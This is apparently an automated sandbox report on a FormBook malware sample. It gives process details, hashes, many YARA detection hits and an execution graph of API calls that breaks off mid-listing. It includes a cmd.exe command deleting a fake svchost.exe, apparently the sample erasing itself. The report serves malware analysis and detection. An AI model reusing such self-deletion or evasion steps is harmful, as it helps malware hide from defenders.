                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:21:14:02
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff674740000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:21:14:04
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\WWAHost.exe"
                                                                                                                                                                          Imagebase:0x260000
                                                                                                                                                                          File size:886'080 bytes
                                                                                                                                                                          MD5 hash:7C7EDAD5BDA9C34FD50C3A58429C90F0
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:21:14:07
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:21:14:08
                                                                                                                                                                          Start date:03/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:4.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                            Signature Coverage:8.2%
                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                            Total number of Limit Nodes:57
                                                                                                                                                                            execution_graph 97729 461066 97734 46f8cf 97729->97734 97731 46106c 97767 482f80 97731->97767 97735 46f8f0 97734->97735 97770 480143 97735->97770 97739 46f937 97780 4677c7 97739->97780 97742 4677c7 59 API calls 97743 46f94b 97742->97743 97744 4677c7 59 API calls 97743->97744 97745 46f955 97744->97745 97746 4677c7 59 API calls 97745->97746 97747 46f993 97746->97747 97748 4677c7 59 API calls 97747->97748 97749 46fa5e 97748->97749 97785 4760e7 97749->97785 97753 46fa90 97754 4677c7 59 API calls 97753->97754 97755 46fa9a 97754->97755 97813 47ffde 97755->97813 97757 46fae1 97758 46faf1 GetStdHandle 97757->97758 97759 46fb3d 97758->97759 97760 4a49d5 97758->97760 97762 46fb45 OleInitialize 97759->97762 97760->97759 97761 4a49de 97760->97761 97820 4c6dda 64 API calls Mailbox 97761->97820 97762->97731 97764 4a49e5 97821 4c74a9 CreateThread 97764->97821 97766 4a49f1 CloseHandle 97766->97762 97893 482e84 97767->97893 97769 461076 97822 48021c 97770->97822 97773 48021c 59 API calls 97774 480185 97773->97774 97775 4677c7 59 API calls 97774->97775 97776 480191 97775->97776 97829 467d2c 97776->97829 97778 46f8f6 97779 4803a2 6 API calls 97778->97779 97779->97739 97781 480ff6 Mailbox 59 API calls 97780->97781 97782 4677e8 97781->97782 97783 480ff6 Mailbox 59 API calls 97782->97783 97784 4677f6 97783->97784 97784->97742 97786 4677c7 59 API calls 97785->97786 97787 4760f7 97786->97787 97788 4677c7 59 API calls 97787->97788 97789 4760ff 97788->97789 97888 475bfd 97789->97888 97792 475bfd 59 API calls 97793 47610f 97792->97793 97794 4677c7 59 API calls 97793->97794 97795 47611a 97794->97795 97796 480ff6 Mailbox 59 API calls 97795->97796 97797 46fa68 97796->97797 97798 476259 97797->97798 97799 476267 97798->97799 97800 4677c7 59 API calls 97799->97800 97801 476272 97800->97801 97802 4677c7 59 API calls 97801->97802 97803 47627d 97802->97803 97804 4677c7 59 API calls 97803->97804 97805 476288 97804->97805 97806 4677c7 59 API calls 97805->97806 97807 476293 97806->97807 97808 475bfd 59 API calls 97807->97808 97809 47629e 97808->97809 97810 480ff6 Mailbox 59 API calls 97809->97810 97811 4762a5 RegisterWindowMessageW 97810->97811 97811->97753 97814 4b5cc3 97813->97814 97815 47ffee 97813->97815 97891 4c9d71 60 API calls 97814->97891 97816 480ff6 Mailbox 59 API calls 97815->97816 97819 47fff6 97816->97819 97818 4b5cce 97819->97757 97820->97764 97821->97766 97892 4c748f 65 API calls 97821->97892 97823 4677c7 59 API calls 97822->97823 97824 480227 97823->97824 97825 4677c7 59 API calls 97824->97825 97826 48022f 97825->97826 97827 4677c7 59 API calls 97826->97827 97828 48017b 97827->97828 97828->97773 97830 467da5 97829->97830 97831 467d38 __wsetenvp 97829->97831 97842 467e8c 97830->97842 97833 467d73 97831->97833 97834 467d4e 97831->97834 97839 468189 97833->97839 97838 468087 59 API calls Mailbox 97834->97838 97837 467d56 _memmove 97837->97778 97838->97837 97846 480ff6 97839->97846 97841 468193 97841->97837 97843 467e9a 97842->97843 97845 467ea3 _memmove 97842->97845 97843->97845 97884 467faf 97843->97884 97845->97837 97849 480ffe 97846->97849 97848 481018 97848->97841 97849->97848 97851 48101c std::exception::exception 97849->97851 97856 48594c 97849->97856 97873 4835e1 DecodePointer 97849->97873 97874 4887db RaiseException 97851->97874 97853 481046 97875 488711 58 API calls _free 97853->97875 97855 481058 97855->97841 97857 4859c7 97856->97857 97864 485958 97856->97864 97882 4835e1 DecodePointer 97857->97882 97859 4859cd 97883 488d68 58 API calls __getptd_noexit 97859->97883 97862 48598b RtlAllocateHeap 97862->97864 97872 4859bf 97862->97872 97864->97862 97865 485963 97864->97865 97866 4859b3 97864->97866 97870 4859b1 97864->97870 97879 4835e1 DecodePointer 97864->97879 97865->97864 97876 48a3ab 58 API calls __NMSG_WRITE 97865->97876 97877 48a408 58 API calls 6 library calls 97865->97877 97878 4832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97865->97878 97880 488d68 58 API calls __getptd_noexit 97866->97880 97881 488d68 58 API calls __getptd_noexit 97870->97881 97872->97849 97873->97849 97874->97853 97875->97855 97876->97865 97877->97865 97879->97864 97880->97870 97881->97872 97882->97859 97883->97872 97885 467fc2 97884->97885 97887 467fbf _memmove 97884->97887 97886 480ff6 Mailbox 59 API calls 97885->97886 97886->97887 97887->97845 97889 4677c7 59 API calls 97888->97889 97890 475c05 97889->97890 97890->97792 97891->97818 97894 482e90 ___lock_fhandle 97893->97894 97901 483457 97894->97901 97900 482eb7 ___lock_fhandle 97900->97769 97918 489e4b 97901->97918 97903 482e99 97904 482ec8 DecodePointer DecodePointer 97903->97904 97905 482ef5 97904->97905 97906 482ea5 97904->97906 97905->97906 97964 4889e4 59 API calls __wcsicmp_l 97905->97964 97915 482ec2 97906->97915 97908 482f58 EncodePointer EncodePointer 97908->97906 97909 482f07 97909->97908 97911 482f2c 97909->97911 97965 488aa4 61 API calls 2 library calls 97909->97965 97911->97906 97913 482f46 EncodePointer 97911->97913 97966 488aa4 61 API calls 2 library calls 97911->97966 97913->97908 97914 482f40 97914->97906 97914->97913 97967 483460 97915->97967 97919 489e5c 97918->97919 97920 489e6f EnterCriticalSection 97918->97920 97925 489ed3 97919->97925 97920->97903 97922 489e62 97922->97920 97949 4832f5 58 API calls 3 library calls 97922->97949 97926 489edf ___lock_fhandle 97925->97926 97927 489ee8 97926->97927 97928 489f00 97926->97928 97950 48a3ab 58 API calls __NMSG_WRITE 97927->97950 97936 489f21 ___lock_fhandle 97928->97936 97953 488a5d 58 API calls 2 library calls 97928->97953 97930 489eed 97951 48a408 58 API calls 6 library calls 97930->97951 97932 489f15 97934 489f2b 97932->97934 97935 489f1c 97932->97935 97939 489e4b __lock 58 API calls 97934->97939 97954 488d68 58 API calls __getptd_noexit 97935->97954 97936->97922 97937 489ef4 97952 4832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97937->97952 97941 489f32 97939->97941 97943 489f3f 97941->97943 97944 489f57 97941->97944 97955 48a06b InitializeCriticalSectionAndSpinCount 97943->97955 97956 482f95 97944->97956 97947 489f4b 97962 489f73 LeaveCriticalSection _doexit 97947->97962 97950->97930 97951->97937 97953->97932 97954->97936 97955->97947 97957 482f9e RtlFreeHeap 97956->97957 97961 482fc7 __dosmaperr 97956->97961 97958 482fb3 97957->97958 97957->97961 97963 488d68 58 API calls __getptd_noexit 97958->97963 97960 482fb9 GetLastError 97960->97961 97961->97947 97962->97936 97963->97960 97964->97909 97965->97911 97966->97914 97970 489fb5 LeaveCriticalSection 97967->97970 97969 482ec7 97969->97900 97970->97969 97971 461016 97976 464ad2 97971->97976 97974 482f80 __cinit 67 API calls 97975 461025 97974->97975 97977 480ff6 Mailbox 59 API calls 97976->97977 97978 464ada 97977->97978 97979 46101b 97978->97979 97983 464a94 97978->97983 97979->97974 97984 464aaf 97983->97984 97985 464a9d 97983->97985 97987 464afe 97984->97987 97986 482f80 __cinit 67 API calls 97985->97986 97986->97984 97988 4677c7 59 API calls 97987->97988 97989 464b16 GetVersionExW 97988->97989 97990 467d2c 59 API calls 97989->97990 97991 464b59 97990->97991 97992 467e8c 59 API calls 97991->97992 98001 464b86 97991->98001 97993 464b7a 97992->97993 98015 467886 97993->98015 97995 464bf1 GetCurrentProcess IsWow64Process 97996 464c0a 97995->97996 97998 464c20 97996->97998 97999 464c89 GetSystemInfo 97996->97999 97997 49dc8d 98011 464c95 97998->98011 98000 464c56 97999->98000 98000->97979 98001->97995 98001->97997 98004 464c32 98007 464c95 2 API calls 98004->98007 98005 464c7d GetSystemInfo 98006 464c47 98005->98006 98006->98000 98009 464c4d FreeLibrary 98006->98009 98008 464c3a GetNativeSystemInfo 98007->98008 98008->98006 98009->98000 98012 464c2e 98011->98012 98013 464c9e LoadLibraryA 98011->98013 98012->98004 98012->98005 98013->98012 98014 464caf GetProcAddress 98013->98014 98014->98012 98016 467894 98015->98016 98017 467e8c 59 API calls 98016->98017 98018 4678a4 98017->98018 98018->98001 98019 461055 98024 462649 98019->98024 98022 482f80 __cinit 67 API calls 98023 461064 98022->98023 98025 4677c7 59 API calls 98024->98025 98026 4626b7 98025->98026 98031 463582 98026->98031 98029 462754 98030 46105a 98029->98030 98034 463416 59 API calls 2 library calls 98029->98034 98030->98022 98035 4635b0 98031->98035 98034->98029 98036 4635a1 98035->98036 98037 4635bd 98035->98037 98036->98029 98037->98036 98038 4635c4 RegOpenKeyExW 98037->98038 98038->98036 98039 4635de RegQueryValueExW 98038->98039 98040 463614 RegCloseKey 98039->98040 98041 4635ff 98039->98041 98040->98036 98041->98040 98042 463633 98043 46366a 98042->98043 98044 4636e5 98043->98044 98045 4636e7 98043->98045 98046 463688 98043->98046 98047 4636ca DefWindowProcW 98044->98047 98048 49d31c 98045->98048 98049 4636ed 98045->98049 98050 463695 98046->98050 98051 46375d PostQuitMessage 98046->98051 98052 4636d8 98047->98052 98092 4711d0 10 API calls Mailbox 98048->98092 98053 463715 SetTimer RegisterWindowMessageW 98049->98053 98054 4636f2 98049->98054 98055 49d38f 98050->98055 98056 4636a0 98050->98056 98051->98052 98053->98052 98060 46373e CreatePopupMenu 98053->98060 98058 49d2bf 98054->98058 98059 4636f9 KillTimer 98054->98059 98097 4c2a16 71 API calls _memset 98055->98097 98061 463767 98056->98061 98062 4636a8 98056->98062 98066 49d2f8 MoveWindow 98058->98066 98067 49d2c4 98058->98067 98087 4644cb Shell_NotifyIconW _memset 98059->98087 98060->98052 98090 464531 64 API calls _memset 98061->98090 98069 4636b3 98062->98069 98070 49d374 98062->98070 98064 49d343 98093 4711f3 341 API calls Mailbox 98064->98093 98066->98052 98075 49d2c8 98067->98075 98076 49d2e7 SetFocus 98067->98076 98073 4636be 98069->98073 98078 46374b 98069->98078 98070->98047 98096 4b817e 59 API calls Mailbox 98070->98096 98071 49d3a1 98071->98047 98071->98052 98073->98047 98094 4644cb Shell_NotifyIconW _memset 98073->98094 98074 46375b 98074->98052 98075->98073 98079 49d2d1 98075->98079 98076->98052 98077 46370c 98088 463114 DeleteObject DestroyWindow Mailbox 98077->98088 98089 4645df 81 API calls _memset 98078->98089 98091 4711d0 10 API calls Mailbox 98079->98091 98085 49d368 98095 4643db 68 API calls _memset 98085->98095 98087->98077 98088->98052 98089->98074 98090->98074 98091->98052 98092->98064 98093->98073 98094->98085 98095->98044 98096->98044 98097->98071 98098 46b56e 98105 47fb84 98098->98105 98100 46b584 98114 46c707 98100->98114 98102 46b5ac 98104 46a4e8 98102->98104 98126 4ca0b5 89 API calls 4 library calls 98102->98126 98106 47fba2 98105->98106 98107 47fb90 98105->98107 98108 47fbd1 98106->98108 98109 47fba8 98106->98109 98127 469e9c 60 API calls Mailbox 98107->98127 98128 469e9c 60 API calls Mailbox 98108->98128 98111 480ff6 Mailbox 59 API calls 98109->98111 98113 47fb9a 98111->98113 98113->98100 98116 46c72c _wcscmp 98114->98116 98129 467b76 98114->98129 98119 46c760 Mailbox 98116->98119 98134 467f41 98116->98134 98119->98102 98123 4a1ad7 98125 4a1adb Mailbox 98123->98125 98148 469e9c 60 API calls Mailbox 98123->98148 98125->98102 98126->98104 98127->98113 98128->98113 98130 480ff6 Mailbox 59 API calls 98129->98130 98131 467b9b 98130->98131 98132 468189 59 API calls 98131->98132 98133 467baa 98132->98133 98133->98116 98135 467f50 __wsetenvp _memmove 98134->98135 98136 480ff6 Mailbox 59 API calls 98135->98136 98137 467f8e 98136->98137 98138 467c8e 98137->98138 98139 467ca0 98138->98139 98140 49f094 98138->98140 98149 467bb1 98139->98149 98155 4b8123 59 API calls _memmove 98140->98155 98143 467cac 98147 46859a 68 API calls 98143->98147 98144 49f09e 98156 4681a7 98144->98156 98146 49f0a6 Mailbox 98147->98123 98148->98125 98150 467be5 _memmove 98149->98150 98151 467bbf 98149->98151 98150->98143 98150->98150 98151->98150 98152 480ff6 Mailbox 59 API calls 98151->98152 98153 467c34 98152->98153 98154 480ff6 Mailbox 59 API calls 98153->98154 98154->98150 98155->98144 98157 4681b2 98156->98157 98158 4681ba 98156->98158 98160 4680d7 59 API calls 2 library calls 98157->98160 98158->98146 98160->98158 98161 4a0251 98162 47fb84 60 API calls 98161->98162 98163 4a0267 98162->98163 98164 4a02e8 98163->98164 98165 4a027d 98163->98165 98173 46fe40 98164->98173 98253 469fbd 60 API calls 98165->98253 98168 4a02dc Mailbox 98172 4a0ce1 Mailbox 98168->98172 98255 4ca0b5 89 API calls 4 library calls 98168->98255 98170 4a02bc 98170->98168 98254 4c85d9 59 API calls Mailbox 98170->98254 98256 4682e0 98173->98256 98175 46fe9d 98176 4a4b57 98175->98176 98221 470856 98175->98221 98261 46f394 98175->98261 98372 4ca0b5 89 API calls 4 library calls 98176->98372 98180 4a4b6c 98181 4a4cb7 98181->98180 98184 46ffac 98181->98184 98378 4da5ee 85 API calls Mailbox 98181->98378 98182 46ff9e 98182->98181 98182->98184 98376 4b6c62 59 API calls 2 library calls 98182->98376 98183 470677 98191 480ff6 Mailbox 59 API calls 98183->98191 98193 4a4d23 98184->98193 98240 4a4f7d 98184->98240 98288 4684dc 59 API calls Mailbox 98184->98288 98185 4a4c01 98185->98180 98374 4ca0b5 89 API calls 4 library calls 98185->98374 98188 480ff6 59 API calls Mailbox 98214 46ff33 98188->98214 98200 4706a5 _memmove 98191->98200 98192 4a4c72 98377 4b6665 59 API calls 2 library calls 98192->98377 98201 4a4d41 98193->98201 98380 468720 59 API calls Mailbox 98193->98380 98195 46fff8 98195->98193 98202 470004 98195->98202 98196 4a4b7f 98196->98185 98373 46f803 341 API calls 98196->98373 98198 4a4cdc Mailbox 98198->98184 98379 4b6c62 59 API calls 2 library calls 98198->98379 98207 480ff6 Mailbox 59 API calls 98200->98207 98206 4a4d52 98201->98206 98381 468720 59 API calls Mailbox 98201->98381 98210 470092 98202->98210 98211 4a4f00 98202->98211 98244 4702d9 Mailbox _memmove 98202->98244 98203 4a4c95 98204 46a000 341 API calls 98203->98204 98204->98181 98206->98244 98382 4b6621 59 API calls Mailbox 98206->98382 98235 470266 _memmove 98207->98235 98213 480ff6 Mailbox 59 API calls 98210->98213 98391 4c9d71 60 API calls 98211->98391 98216 470099 98213->98216 98214->98180 98214->98182 98214->98183 98214->98188 98214->98196 98214->98200 98227 4a4c36 98214->98227 98265 46a000 98214->98265 98216->98221 98289 470b30 98216->98289 98218 46a000 341 API calls 98220 4a4eb1 98218->98220 98220->98180 98386 468620 98220->98386 98371 4ca0b5 89 API calls 4 library calls 98221->98371 98223 470112 98223->98200 98223->98221 98230 470146 98223->98230 98375 4ca0b5 89 API calls 4 library calls 98227->98375 98229 4a4edc 98390 4ca0b5 89 API calls 4 library calls 98229->98390 98234 4681a7 59 API calls 98230->98234 98238 470167 98230->98238 98234->98238 98235->98244 98252 4702c2 98235->98252 98370 469df0 59 API calls Mailbox 98235->98370 98236 4704f8 98236->98168 98237 480ff6 59 API calls Mailbox 98237->98244 98238->98221 98239 4a4f4e 98238->98239 98242 4701ac 98238->98242 98392 469e9c 60 API calls Mailbox 98239->98392 98240->98180 98393 4ca0b5 89 API calls 4 library calls 98240->98393 98242->98221 98242->98240 98245 470238 98242->98245 98243 4a4e46 98248 480ff6 Mailbox 59 API calls 98243->98248 98244->98221 98244->98229 98244->98236 98244->98237 98244->98243 98251 4a4e77 98244->98251 98368 4688a0 68 API calls __cinit 98244->98368 98369 4687c0 68 API calls 98244->98369 98383 4c5bd9 68 API calls 98244->98383 98384 468b13 69 API calls Mailbox 98244->98384 98385 469e9c 60 API calls Mailbox 98244->98385 98366 469e9c 60 API calls Mailbox 98245->98366 98247 47024b 98247->98221 98367 46843f 59 API calls Mailbox 98247->98367 98248->98251 98251->98218 98252->98168 98253->98170 98254->98168 98255->98172 98257 4682ef 98256->98257 98260 46830a 98256->98260 98258 467faf 59 API calls 98257->98258 98259 4682f7 CharUpperBuffW 98258->98259 98259->98260 98260->98175 98262 46f3b1 98261->98262 98263 46f3d2 98262->98263 98394 4ca0b5 89 API calls 4 library calls 98262->98394 98263->98214 98266 46a01f 98265->98266 98287 46a04d Mailbox 98265->98287 98268 480ff6 Mailbox 59 API calls 98266->98268 98267 482f80 67 API calls __cinit 98267->98287 98268->98287 98269 46b5d5 98270 4681a7 59 API calls 98269->98270 98273 46a1b7 98270->98273 98271 46b5da 98400 4ca0b5 89 API calls 4 library calls 98271->98400 98272 4677c7 59 API calls 98272->98287 98273->98214 98274 480ff6 59 API calls Mailbox 98274->98287 98277 4681a7 59 API calls 98277->98287 98279 4a047f 98397 4ca0b5 89 API calls 4 library calls 98279->98397 98282 4b7405 59 API calls 98282->98287 98283 4a048e 98283->98214 98284 4a0e00 98399 4ca0b5 89 API calls 4 library calls 98284->98399 98286 46a6ba 98398 4ca0b5 89 API calls 4 library calls 98286->98398 98287->98267 98287->98269 98287->98271 98287->98272 98287->98273 98287->98274 98287->98277 98287->98279 98287->98282 98287->98284 98287->98286 98395 46ca20 341 API calls 2 library calls 98287->98395 98396 46ba60 60 API calls Mailbox 98287->98396 98288->98195 98290 4a50ed 98289->98290 98302 470b55 98289->98302 98456 4ca0b5 89 API calls 4 library calls 98290->98456 98292 470e5a 98292->98223 98295 471044 98295->98292 98297 471051 98295->98297 98296 470bab PeekMessageW 98365 470b65 Mailbox 98296->98365 98454 4711f3 341 API calls Mailbox 98297->98454 98300 471058 LockWindowUpdate DestroyWindow GetMessageW 98300->98292 98304 47108a 98300->98304 98301 470e44 98301->98292 98453 4711d0 10 API calls Mailbox 98301->98453 98302->98365 98457 469fbd 60 API calls 98302->98457 98458 4b68bf 341 API calls 98302->98458 98303 4a52ab Sleep 98303->98365 98306 4a6082 TranslateMessage DispatchMessageW GetMessageW 98304->98306 98306->98306 98307 4a60b2 98306->98307 98307->98292 98308 4a517a TranslateAcceleratorW 98310 470fa3 PeekMessageW 98308->98310 98308->98365 98309 469fbd 60 API calls 98309->98365 98310->98365 98311 470fbf TranslateMessage DispatchMessageW 98311->98310 98312 4a5c49 WaitForSingleObject 98316 4a5c66 GetExitCodeProcess CloseHandle 98312->98316 98312->98365 98314 480ff6 59 API calls Mailbox 98314->98365 98315 470e73 timeGetTime 98315->98365 98348 4710f5 98316->98348 98317 470fdd Sleep 98349 470fee Mailbox 98317->98349 98318 4681a7 59 API calls 98318->98365 98319 4677c7 59 API calls 98319->98349 98320 4a5f22 Sleep 98320->98349 98323 480719 timeGetTime 98323->98349 98324 4710ae timeGetTime 98455 469fbd 60 API calls 98324->98455 98327 4a5fb9 GetExitCodeProcess 98330 4a5fcf WaitForSingleObject 98327->98330 98331 4a5fe5 CloseHandle 98327->98331 98329 46b93d 109 API calls 98329->98349 98330->98331 98330->98365 98331->98349 98334 4e61ac 110 API calls 98334->98349 98335 4a5c9e 98335->98348 98336 4a54a2 Sleep 98336->98365 98337 4a6041 Sleep 98337->98365 98339 467f41 59 API calls 98339->98349 98345 46fe40 314 API calls 98345->98365 98348->98223 98349->98319 98349->98323 98349->98327 98349->98329 98349->98334 98349->98335 98349->98336 98349->98337 98349->98339 98349->98348 98349->98365 98483 4c28f7 60 API calls 98349->98483 98484 469fbd 60 API calls 98349->98484 98485 468b13 69 API calls Mailbox 98349->98485 98486 46b89c 341 API calls 98349->98486 98487 4b6a50 60 API calls 98349->98487 98488 4c54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98349->98488 98489 4c3e91 66 API calls Mailbox 98349->98489 98350 4ca0b5 89 API calls 98350->98365 98352 468620 69 API calls 98352->98365 98353 469df0 59 API calls Mailbox 98353->98365 98354 46a000 314 API calls 98354->98365 98355 46b89c 314 API calls 98355->98365 98357 4b66f4 59 API calls Mailbox 98357->98365 98358 468b13 69 API calls 98358->98365 98359 4a59ff VariantClear 98359->98365 98360 4b7405 59 API calls 98360->98365 98361 4a5a95 VariantClear 98361->98365 98362 468e34 59 API calls Mailbox 98362->98365 98363 4a5843 VariantClear 98363->98365 98364 467f41 59 API calls 98364->98365 98365->98296 98365->98301 98365->98303 98365->98308 98365->98309 98365->98310 98365->98311 98365->98312 98365->98314 98365->98315 98365->98317 98365->98318 98365->98320 98365->98324 98365->98345 98365->98348 98365->98349 98365->98350 98365->98352 98365->98353 98365->98354 98365->98355 98365->98357 98365->98358 98365->98359 98365->98360 98365->98361 98365->98362 98365->98363 98365->98364 98401 46e800 98365->98401 98432 46f5c0 98365->98432 98451 46e580 341 API calls 98365->98451 98452 4631ce IsDialogMessageW GetClassLongW 98365->98452 98459 4e629f 59 API calls 98365->98459 98460 4c9c9f 59 API calls Mailbox 98365->98460 98461 4bd9e3 59 API calls 98365->98461 98462 469997 98365->98462 98480 4b6665 59 API calls 2 library calls 98365->98480 98481 468561 59 API calls 98365->98481 98482 46843f 59 API calls Mailbox 98365->98482 98366->98247 98367->98235 98368->98244 98369->98244 98370->98235 98371->98176 98372->98180 98373->98185 98374->98180 98375->98180 98376->98192 98377->98203 98378->98198 98379->98198 98380->98201 98381->98206 98382->98244 98383->98244 98384->98244 98385->98244 98387 46862b 98386->98387 98389 468652 98387->98389 99704 468b13 69 API calls Mailbox 98387->99704 98389->98229 98390->98180 98391->98230 98392->98240 98393->98180 98394->98263 98395->98287 98396->98287 98397->98283 98398->98273 98399->98271 98400->98273 98402 46e835 98401->98402 98403 4a3ed3 98402->98403 98407 46e89f 98402->98407 98415 46e8f9 98402->98415 98404 46a000 341 API calls 98403->98404 98405 4a3ee8 98404->98405 98431 46ead0 Mailbox 98405->98431 98491 4ca0b5 89 API calls 4 library calls 98405->98491 98406 4677c7 59 API calls 98406->98415 98409 4677c7 59 API calls 98407->98409 98407->98415 98411 4a3f2e 98409->98411 98410 482f80 __cinit 67 API calls 98410->98415 98413 482f80 __cinit 67 API calls 98411->98413 98412 4a3f50 98412->98365 98413->98415 98414 468620 69 API calls 98414->98431 98415->98406 98415->98410 98415->98412 98418 46eaba 98415->98418 98415->98431 98416 46a000 341 API calls 98416->98431 98418->98431 98492 4ca0b5 89 API calls 4 library calls 98418->98492 98419 468ea0 59 API calls 98419->98431 98423 46f2f5 98496 4ca0b5 89 API calls 4 library calls 98423->98496 98424 4a424f 98424->98365 98427 4ca0b5 89 API calls 98427->98431 98430 46ebd8 98430->98365 98431->98414 98431->98416 98431->98419 98431->98423 98431->98427 98431->98430 98490 4680d7 59 API calls 2 library calls 98431->98490 98493 4b7405 59 API calls 98431->98493 98494 4dc8d7 341 API calls 98431->98494 98495 4db851 341 API calls Mailbox 98431->98495 98497 469df0 59 API calls Mailbox 98431->98497 98498 4d96db 341 API calls Mailbox 98431->98498 98433 46f7b0 98432->98433 98434 46f61a 98432->98434 98437 467f41 59 API calls 98433->98437 98435 46f626 98434->98435 98436 4a4848 98434->98436 98499 46f3f0 98435->98499 98607 4dbf80 98436->98607 98444 46f6ec Mailbox 98437->98444 98440 46f790 98440->98365 98441 